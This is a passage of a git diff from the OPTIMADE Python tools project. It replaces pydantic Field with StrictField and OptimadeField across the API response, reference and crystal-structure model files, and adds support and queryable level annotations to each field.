Warnings(OptimadeError): """ - type: str = Field( + type: str = StrictField( "warning", const="warning", description='Warnings must be of type "warning"', @@ -182,7 +182,7 @@ class Warnings(OptimadeError): class ResponseMetaQuery(BaseModel): """ Information on the query that was requested. """ - representation: str = Field( + representation: str = StrictField( ..., description="""A string with the part of the URL following the versioned or unversioned base URL that serves the API. Query parameters that have not been used in processing the request MAY be omitted. @@ -194,18 +194,18 @@ Example: `/structures?filter=nelements=2`""", class Provider(BaseModel): """Information on the database provider of the implementation.""" - name: str = Field(..., description="a short name for the database provider") + name: str = StrictField(..., description="a short name for the database provider") - description: str = Field( + description: str = StrictField( ..., description="a longer description of the database provider" ) - prefix: str = Field( + prefix: str = StrictField( ..., description="database-provider-specific prefix as found in section Database-Provider-Specific Namespace Prefixes.", ) - homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = Field( + homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = StrictField( None, description="a [JSON API links object](http://jsonapi.org/format/1.0#document-links) " "pointing to homepage of the database provider, either " @@ -216,29 +216,29 @@ class Provider(BaseModel): class ImplementationMaintainer(BaseModel): """Details about the maintainer of the implementation""" - email: EmailStr = Field(..., description="the maintainer's email address") + email: EmailStr = StrictField(..., description="the maintainer's email address") class Implementation(BaseModel): """Information on the server implementation""" - name: Optional[str] = Field(None, description="name of the implementation") + name: Optional[str] = StrictField(None, 
description="name of the implementation") - version: Optional[str] = Field( + version: Optional[str] = StrictField( None, description="version string of the current implementation" ) - homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = Field( + homepage: Optional[Union[AnyHttpUrl, jsonapi.Link]] = StrictField( None, description="A [JSON API links object](http://jsonapi.org/format/1.0/#document-links) pointing to the homepage of the implementation.", ) - source_url: Optional[Union[AnyUrl, jsonapi.Link]] = Field( + source_url: Optional[Union[AnyUrl, jsonapi.Link]] = StrictField( None, description="A [JSON API links object](http://jsonapi.org/format/1.0/#document-links) pointing to the implementation source, either downloadable archive or version control system.", ) - maintainer: Optional[ImplementationMaintainer] = Field( + maintainer: Optional[ImplementationMaintainer] = StrictField( None, description="A dictionary providing details about the maintainer of the implementation.", ) @@ -255,24 +255,24 @@ class ResponseMeta(jsonapi.Meta): database-provider-specific prefix. """ - query: ResponseMetaQuery = Field( + query: ResponseMetaQuery = StrictField( ..., description="Information on the Query that was requested" ) - api_version: SemanticVersion = Field( + api_version: SemanticVersion = StrictField( ..., description="""Presently used full version of the OPTIMADE API. The version number string MUST NOT be prefixed by, e.g., "v". 
Examples: `1.0.0`, `1.0.0-rc.2`.""", ) - more_data_available: bool = Field( + more_data_available: bool = StrictField( ..., description="`false` if the response contains all data for the request (e.g., a request issued to a single entry endpoint, or a `filter` query at the last page of a paginated response) and `true` if the response is incomplete in the sense that multiple objects match the request, and not all of them have been included in the response (e.g., a query with multiple pages that is not at the last page).", ) # start of "SHOULD" fields for meta response - optimade_schema: Optional[Union[AnyHttpUrl, jsonapi.Link]] = Field( + optimade_schema: Optional[Union[AnyHttpUrl, jsonapi.Link]] = StrictField( None, alias="schema", description="""A [JSON API links object](http://jsonapi.org/format/1.0/#document-links) that points to a schema for the response. @@ -281,40 +281,40 @@ It is possible that future versions of this specification allows for alternative Hence, if the `meta` field of the JSON API links object is provided and contains a field `schema_type` that is not equal to the string `OpenAPI` the client MUST not handle failures to parse the schema or to validate the response against the schema as errors.""", ) - time_stamp: Optional[datetime] = Field( + time_stamp: Optional[datetime] = StrictField( None, description="A timestamp containing the date and time at which the query was executed.", ) - data_returned: Optional[int] = Field( + data_returned: Optional[int] = StrictField( None, description="An integer containing the total number of data resource objects returned for the current `filter` query, independent of pagination.", ge=0, ) - provider: Optional[Provider] = Field( + provider: Optional[Provider] = StrictField( None, description="information on the database provider of the implementation." 
) # start of "MAY" fields for meta response - data_available: Optional[int] = Field( + data_available: Optional[int] = StrictField( None, description="An integer containing the total number of data resource objects available in the database for the endpoint.", ) - last_id: Optional[str] = Field( + last_id: Optional[str] = StrictField( None, description="a string containing the last ID returned" ) - response_message: Optional[str] = Field( + response_message: Optional[str] = StrictField( None, description="response string from the server" ) - implementation: Optional[Implementation] = Field( + implementation: Optional[Implementation] = StrictField( None, description="a dictionary describing the server implementation" ) - warnings: Optional[List[Warnings]] = Field( + warnings: Optional[List[Warnings]] = StrictField( None, description="""A list of warning resource objects representing non-critical errors or warnings. A warning resource object is defined similarly to a [JSON API error object](http://jsonapi.org/format/1.0/#error-objects), but MUST also include the field `type`, which MUST have the value `"warning"`. 
@@ -328,7 +328,7 @@ This is an exclusive field for error resource objects.""", class Success(jsonapi.Response): """errors are not allowed""" - meta: ResponseMeta = Field( + meta: ResponseMeta = StrictField( ..., description="A meta object containing non-standard information" ) @@ -351,7 +351,7 @@ class Success(jsonapi.Response): class BaseRelationshipMeta(jsonapi.Meta): """Specific meta field for base relationship resource""" - description: str = Field( + description: str = StrictField( ..., description="OPTIONAL human-readable description of the relationship" ) @@ -359,7 +359,7 @@ class BaseRelationshipMeta(jsonapi.Meta): class BaseRelationshipResource(jsonapi.BaseResource): """Minimum requirements to represent a relationship resource""" - meta: Optional[BaseRelationshipMeta] = Field( + meta: Optional[BaseRelationshipMeta] = StrictField( None, description="Relationship meta field. MUST contain 'description' if supplied.", ) @@ -370,4 +370,4 @@ class Relationship(jsonapi.Relationship): data: Optional[ Union[BaseRelationshipResource, List[BaseRelationshipResource]] - ] = Field(None, description="Resource linkage", uniqueItems=True) + ] = StrictField(None, description="Resource linkage", uniqueItems=True) diff --git a/optimade/models/references.py b/optimade/models/references.py index 90570ae0..83a8c7d9 100644 --- a/optimade/models/references.py +++ b/optimade/models/references.py @@ -1,6 +1,5 @@ # pylint: disable=line-too-long,no-self-argument from pydantic import ( # pylint: disable=no-name-in-module - Field, BaseModel, AnyUrl, validator, @@ -8,15 +7,35 @@ from pydantic import ( # pylint: disable=no-name-in-module from typing import List, Optional from optimade.models.entries import EntryResource, EntryResourceAttributes +from optimade.models.utils import OptimadeField, SupportLevel __all__ = ("Person", "ReferenceResourceAttributes", "ReferenceResource") class Person(BaseModel): - name: str = Field(..., decsription="""Full name of the person, REQUIRED.""") - 
firstname: Optional[str] = Field(None, description="""First name of the person.""") - lastname: Optional[str] = Field(None, description="""Last name of the person.""") + """A person, i.e., an author, editor or other.""" + + name: str = OptimadeField( + ..., + description="""Full name of the person, REQUIRED.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, + ) + + firstname: Optional[str] = OptimadeField( + None, + description="""First name of the person.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ) + + lastname: Optional[str] = OptimadeField( + None, + description="""Last name of the person.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ) class ReferenceResourceAttributes(EntryResourceAttributes): @@ -27,87 +46,186 @@ class ReferenceResourceAttributes(EntryResourceAttributes): """ - authors: Optional[List[Person]] = Field( + authors: Optional[List[Person]] = OptimadeField( None, description="List of person objects containing the authors of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - editors: Optional[List[Person]] = Field( + + editors: Optional[List[Person]] = OptimadeField( None, description="List of person objects containing the editors of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - doi: Optional[str] = Field( - None, description="The digital object identifier of the reference." 
+ doi: Optional[str] = OptimadeField( + None, + description="The digital object identifier of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - url: Optional[AnyUrl] = Field(None, description="The URL of the reference.") + url: Optional[AnyUrl] = OptimadeField( + None, + description="The URL of the reference.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ) - address: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + address: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - annote: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + annote: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - booktitle: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + booktitle: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - chapter: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + chapter: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - crossref: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." 
+ + crossref: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - edition: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + edition: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - howpublished: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + howpublished: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - institution: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + institution: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - journal: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + journal: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - key: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + key: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - month: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." 
+ + month: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - note: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + note: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - number: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + number: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - organization: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + organization: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - pages: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + pages: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - publisher: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + publisher: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - school: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." 
+ + school: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - series: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + series: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - title: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + title: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - bib_type: Optional[str] = Field( + + bib_type: Optional[str] = OptimadeField( None, description="Type of the reference, corresponding to the **type** property in the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - volume: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + volume: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - year: Optional[str] = Field( - None, description="Meaning of property matches the BiBTeX specification." + + year: Optional[str] = OptimadeField( + None, + description="Meaning of property matches the BiBTeX specification.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) @@ -130,7 +248,7 @@ class ReferenceResource(EntryResource): """ - type: str = Field( + type: str = OptimadeField( "references", const="references", description="""The name of the type of an entry. 
@@ -143,6 +261,8 @@ class ReferenceResource(EntryResource): - The entry of type <type> and ID <id> MUST be returned in response to a request for `/<type>/<id>` under the versioned base URL. - **Example**: `"structures"`""", pattern="^references$", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) attributes: ReferenceResourceAttributes diff --git a/optimade/models/responses.py b/optimade/models/responses.py index 61fe03a4..6662fa26 100644 --- a/optimade/models/responses.py +++ b/optimade/models/responses.py @@ -11,6 +11,7 @@ from optimade.models.links import LinksResource from optimade.models.optimade_json import Success, ResponseMeta, OptimadeError from optimade.models.references import ReferenceResource from optimade.models.structures import StructureResource +from optimade.models.utils import StrictField __all__ = ( @@ -31,10 +32,10 @@ __all__ = ( class ErrorResponse(Response): """errors MUST be present and data MUST be skipped""" - meta: ResponseMeta = Field( + meta: ResponseMeta = StrictField( ..., description="A meta object containing non-standard information" ) - errors: List[OptimadeError] = Field( + errors: List[OptimadeError] = StrictField( ..., description="A list of OPTIMADE-specific JSON API error objects, where the field detail MUST be present.", uniqueItems=True, @@ -48,17 +49,21 @@ class ErrorResponse(Response): class IndexInfoResponse(Success): - data: IndexInfoResource = Field(..., description="Index meta-database /info data") + data: IndexInfoResource = StrictField( + ..., description="Index meta-database /info data" + ) class EntryInfoResponse(Success): - data: EntryInfoResource = Field( + data: EntryInfoResource = StrictField( ..., description="OPTIMADE information for an entry endpoint" ) class InfoResponse(Success): - data: BaseInfoResource = Field(..., description="The implementations /info data") + data: BaseInfoResource = StrictField( + ..., description="The implementations /info data" + ) class EntryResponseOne(Success): @@ 
-78,7 +83,7 @@ class EntryResponseMany(Success): class LinksResponse(EntryResponseMany): - data: Union[List[LinksResource], List[Dict[str, Any]]] = Field( + data: Union[List[LinksResource], List[Dict[str, Any]]] = StrictField( ..., description="List of unique OPTIMADE links resource objects", uniqueItems=True, @@ -86,13 +91,13 @@ class LinksResponse(EntryResponseMany): class StructureResponseOne(EntryResponseOne): - data: Union[StructureResource, Dict[str, Any], None] = Field( + data: Union[StructureResource, Dict[str, Any], None] = StrictField( ..., description="A single structures entry resource" ) class StructureResponseMany(EntryResponseMany): - data: Union[List[StructureResource], List[Dict[str, Any]]] = Field( + data: Union[List[StructureResource], List[Dict[str, Any]]] = StrictField( ..., description="List of unique OPTIMADE structures entry resource objects", uniqueItems=True, @@ -100,13 +105,13 @@ class StructureResponseMany(EntryResponseMany): class ReferenceResponseOne(EntryResponseOne): - data: Union[ReferenceResource, Dict[str, Any], None] = Field( + data: Union[ReferenceResource, Dict[str, Any], None] = StrictField( ..., description="A single references entry resource" ) class ReferenceResponseMany(EntryResponseMany): - data: Union[List[ReferenceResource], List[Dict[str, Any]]] = Field( + data: Union[List[ReferenceResource], List[Dict[str, Any]]] = StrictField( ..., description="List of unique OPTIMADE references entry resource objects", uniqueItems=True, diff --git a/optimade/models/structures.py b/optimade/models/structures.py index 09acafef..93a03c27 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -3,11 +3,16 @@ from enum import IntEnum, Enum from sys import float_info from typing import List, Optional, Union -from pydantic import Field, BaseModel, validator, root_validator, conlist +from pydantic import BaseModel, validator, root_validator, conlist from optimade.models.entries import EntryResourceAttributes, 
EntryResource -from optimade.models.utils import CHEMICAL_SYMBOLS, EXTRA_SYMBOLS - +from optimade.models.utils import ( + CHEMICAL_SYMBOLS, + EXTRA_SYMBOLS, + OptimadeField, + StrictField, + SupportLevel, +) EXTENDED_CHEMICAL_SYMBOLS = CHEMICAL_SYMBOLS + EXTRA_SYMBOLS @@ -64,12 +69,14 @@ class Species(BaseModel): """ - name: str = Field( + name: str = OptimadeField( ..., - decsription="""Gives the name of the species; the **name** value MUST be unique in the `species` list.""", + description="""Gives the name of the species; the **name** value MUST be unique in the `species` list.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - chemical_symbols: List[str] = Field( + chemical_symbols: List[str] = OptimadeField( ..., description="""MUST be a list of strings of all chemical elements composing this species. Each item of the list MUST be one of the following: @@ -78,9 +85,11 @@ class Species(BaseModel): - the special value `"vacancy"` to represent that this site has a non-zero probability of having a vacancy (the respective probability is indicated in the `concentration` list, see below). If any one entry in the `species` list has a `chemical_symbols` list that is longer than 1 element, the correct flag MUST be set in the list `structure_features`.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - concentration: List[float] = Field( + concentration: List[float] = OptimadeField( ..., description="""MUST be a list of floats, with same length as `chemical_symbols`. The numbers represent the relative concentration of the corresponding chemical symbol in this species. The numbers SHOULD sum to one. Cases in which the numbers do not sum to one typically fall only in the following two categories: @@ -88,29 +97,39 @@ If any one entry in the `species` list has a `chemical_symbols` list that is lon - Experimental errors in the data present in the database. 
In this case, it is the responsibility of the client to decide how to process the data. Note that concentrations are uncorrelated between different site (even of the same species).""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - mass: Optional[float] = Field( + mass: Optional[float] = OptimadeField( None, description="""If present MUST be a float expressed in a.m.u.""", unit="a.m.u.", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - original_name: Optional[str] = Field( + original_name: Optional[str] = OptimadeField( None, description="""Can be any valid Unicode string, and SHOULD contain (if specified) the name of the species that is used internally in the source database. Note: With regards to "source database", we refer to the immediate source being queried via the OPTIMADE API implementation.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - attached: Optional[List[str]] = Field( + attached: Optional[List[str]] = OptimadeField( None, description="""If provided MUST be a list of length 1 or more of strings of chemical symbols for the elements attached to this site, or "X" for a non-chemical element.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - nattached: Optional[List[int]] = Field( + nattached: Optional[List[int]] = OptimadeField( None, description="""If provided MUST be a list of length 1 or more of integers indicating the number of attached atoms of the kind specified in the value of the :field:`attached` key.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) @validator("chemical_symbols", each_item=True) @@ -172,21 +191,25 @@ class Assembly(BaseModel): """ - sites_in_groups: List[List[int]] = Field( + sites_in_groups: List[List[int]] = OptimadeField( ..., description="""Index of the sites (0-based) that belong to each group for each assembly. - **Examples**: - `[[1], [2]]`: two groups, one with the second site, one with the third. 
- `[[1,2], [3]]`: one group with the second and third site, one with the fourth.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) - group_probabilities: List[float] = Field( + group_probabilities: List[float] = OptimadeField( ..., description="""Statistical probability of each group. It MUST have the same length as `sites_in_groups`. It SHOULD sum to one. See below for examples of how to specify the probability of the occurrence of a vacancy. The possible reasons for the values not to sum to one are the same as already specified above for the `concentration` of each `species`.""", + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, ) @validator("sites_in_groups") @@ -212,7 +235,7 @@ The possible reasons for the values not to sum to one are the same as already sp class StructureResourceAttributes(EntryResourceAttributes): """This class contains the Field for the attributes used to represent a structure, e.g. unit cell, atoms, positions.""" - elements: List[str] = Field( + elements: List[str] = OptimadeField( ..., description="""Names of the different elements present in the structure. @@ -232,9 +255,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - **Query examples**: - A filter that matches all records of structures that contain Si, Al **and** O, and possibly other elements: `elements HAS ALL "Si", "Al", "O"`. - To match structures with exactly these three elements, use `elements HAS ALL "Si", "Al", "O" AND elements LENGTH 3`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - nelements: int = Field( + nelements: int = OptimadeField( ..., description="""Number of different elements in the structure as an integer. @@ -251,9 +276,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - Note: queries on this property can equivalently be formulated using `elements LENGTH`. - A filter that matches structures that have exactly 4 elements: `nelements=4`. 
- A filter that matches structures that have between 2 and 7 elements: `nelements>=2 AND nelements<=7`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - elements_ratios: List[float] = Field( + elements_ratios: List[float] = OptimadeField( ..., description="""Relative proportions of different elements in the structure. @@ -273,9 +300,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - Note: Useful filters can be formulated using the set operator syntax for correlated values. However, since the values are floating point values, the use of equality comparisons is generally inadvisable. - OPTIONAL: a filter that matches structures where approximately 1/3 of the atoms in the structure are the element Al is: `elements:elements_ratios HAS ALL "Al":>0.3333, "Al":<0.3334`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - chemical_formula_descriptive: str = Field( + chemical_formula_descriptive: str = OptimadeField( ..., description="""The chemical formula for a structure as a string in a form chosen by the API implementation. @@ -299,9 +328,11 @@ class StructureResourceAttributes(EntryResourceAttributes): - Note: the free-form nature of this property is likely to make queries on it across different databases inconsistent. - A filter that matches an exactly given formula: `chemical_formula_descriptive="(H2O)2 Na"`. - A filter that does a partial match: `chemical_formula_descriptive CONTAINS "H2O"`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - chemical_formula_reduced: str = Field( + chemical_formula_reduced: str = OptimadeField( ..., description="""The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers. The proportion number MUST be omitted if it is 1. @@ -326,9 +357,11 @@ The proportion number MUST be omitted if it is 1. 
- **Query examples**: - A filter that matches an exactly given formula is `chemical_formula_reduced="H2NaO"`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - chemical_formula_hill: Optional[str] = Field( + chemical_formula_hill: Optional[str] = OptimadeField( None, description="""The chemical formula for a structure in [Hill form](https://dx.doi.org/10.1021/ja02046a005) with element symbols followed by integer chemical proportion numbers. The proportion number MUST be omitted if it is 1. @@ -354,9 +387,11 @@ The proportion number MUST be omitted if it is 1. - **Query examples**: - A filter that matches an exactly given formula is `chemical_formula_hill="H2O2"`.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - chemical_formula_anonymous: str = Field( + chemical_formula_anonymous: str = OptimadeField( ..., description="""The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on. @@ -373,9 +408,11 @@ The proportion number MUST be omitted if it is 1. - **Querying**: - A filter that matches an exactly given formula is `chemical_formula_anonymous="A2B"`.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - dimension_types: conlist(Periodicity, min_items=3, max_items=3) = Field( + dimension_types: conlist(Periodicity, min_items=3, max_items=3) = OptimadeField( ..., description="""List of three integers. For each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`). 
@@ -394,9 +431,11 @@ Note: the elements in this list each refer to the direction of the corresponding - For a wire along the direction specified by the third lattice vector: `[0, 0, 1]` - For a 2D surface/slab, periodic on the plane defined by the first and third lattice vectors: `[1, 0, 1]` - For a bulk 3D system: `[1, 1, 1]`""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - nperiodic_dimensions: int = Field( + nperiodic_dimensions: int = OptimadeField( ..., description="""An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`. @@ -414,9 +453,13 @@ Note: the elements in this list each refer to the direction of the corresponding - **Query examples**: - Match only structures with exactly 3 periodic dimensions: `nperiodic_dimensions=3` - Match all structures with 2 or fewer periodic dimensions: `nperiodic_dimensions<=2`""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.MUST, ) - lattice_vectors: conlist(Vector3D_unknown, min_items=3, max_items=3) = Field( + lattice_vectors: conlist( + Vector3D_unknown, min_items=3, max_items=3 + ) = OptimadeField( ..., description="""The three lattice vectors in Cartesian coordinates, in ångström (Å). @@ -438,9 +481,11 @@ Note: the elements in this list each refer to the direction of the corresponding - **Examples**: - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 Å; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`.""", unit="Å", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - cartesian_site_positions: List[Vector3D] = Field( + cartesian_site_positions: List[Vector3D] = OptimadeField( ..., description="""Cartesian positions of each site in the structure. 
A site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property. @@ -457,9 +502,11 @@ A site is usually used to describe positions of atoms; what atoms can be encount - **Examples**: - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 Å away from the origin.""", unit="Å", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - nsites: int = Field( + nsites: int = OptimadeField( ..., description="""An integer specifying the length of the `cartesian_site_positions` property. @@ -475,9 +522,11 @@ A site is usually used to describe positions of atoms; what atoms can be encount - **Query examples**: - Match only structures with exactly 4 sites: `nsites=4` - Match structures that have between 2 and 7 sites: `nsites>=2 AND nsites<=7`""", + queryable=SupportLevel.MUST, + support=SupportLevel.SHOULD, ) - species: List[Species] = Field( + species: List[Species] = OptimadeField( ..., description="""A list describing the species of the sites of this structure. Species can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3). @@ -539,9 +588,11 @@ Species can represent pure chemical elements, virtual-crystal atoms representing - `[ {"name": "C12", "chemical_symbols": ["C"], "concentration": [1.0], "mass": 12.0} ]`: any site with this species is occupied by a carbon isotope with mass 12. 
- `[ {"name": "C13", "chemical_symbols": ["C"], "concentration": [1.0], "mass": 13.0} ]`: any site with this species is occupied by a carbon isotope with mass 13. - `[ {"name": "CH3", "chemical_symbols": ["C"], "concentration": [1.0], "attached": ["H"], "nattached": [3]} ]`: any site with this species is occupied by a methyl group, -CH3, which is represented without specifying precise positions of the hydrogen atoms.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - species_at_sites: List[str] = Field( + species_at_sites: List[str] = OptimadeField( ..., description="""Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`). The properties of the species are found in the property `species`. @@ -561,9 +612,11 @@ The properties of the species are found in the property `species`. - **Examples**: - `["Ti","O2"]` indicates that the first site is hosting a species labeled `"Ti"` and the second a species labeled `"O2"`. - `["Ac", "Ac", "Ag", "Ir"]` indicating the first two sites contains the `"Ac"` species, while the third and fourth sites contain the `"Ag"` and `"Ir"` species, respectively.""", + support=SupportLevel.SHOULD, + queryable=SupportLevel.OPTIONAL, ) - assemblies: Optional[List[Assembly]] = Field( + assemblies: Optional[List[Assembly]] = OptimadeField( None, description="""A description of groups of sites that are statistically correlated. @@ -667,9 +720,11 @@ The properties of the species are found in the property `species`. Site 0 is present with a probability of 20 % and site 1 with a probability of 80 %. These two sites are correlated (either site 0 or 1 is present). Similarly, site 2 is present with a probability of 30 % and site 3 with a probability of 70 %. These two sites are correlated (either site 2 or 3 is present). 
However, the presence or absence of sites 0 and 1 is not correlated with the presence or absence of sites 2 and 3 (in the specific example, the pair of sites (0, 2) can occur with 0.2*0.3 = 6 % probability; the pair (0, 3) with 0.2*0.7 = 14 % probability; the pair (1, 2) with 0.8*0.3 = 24 % probability; and the pair (1, 3) with 0.8*0.7 = 56 % probability).""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, ) - structure_features: List[StructureFeatures] = Field( + structure_features: List[StructureFeatures] = OptimadeField( ..., description="""A list of strings that flag which special features are used by the structure. @@ -692,6 +747,8 @@ The properties of the species are found in the property `species`. - `assemblies`: this flag MUST be present if the property `assemblies` is present. - **Examples**: A structure having implicit atoms and using assemblies: `["assemblies", "implicit_atoms"]`""", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) @validator("elements", each_item=True) @@ -868,7 +925,7 @@ The properties of the species are found in the property `species`. class StructureResource(EntryResource): """Representing a structure.""" - type: str = Field( + type: str = StrictField( "structures", const="structures", description="""The name of the type of an entry. 
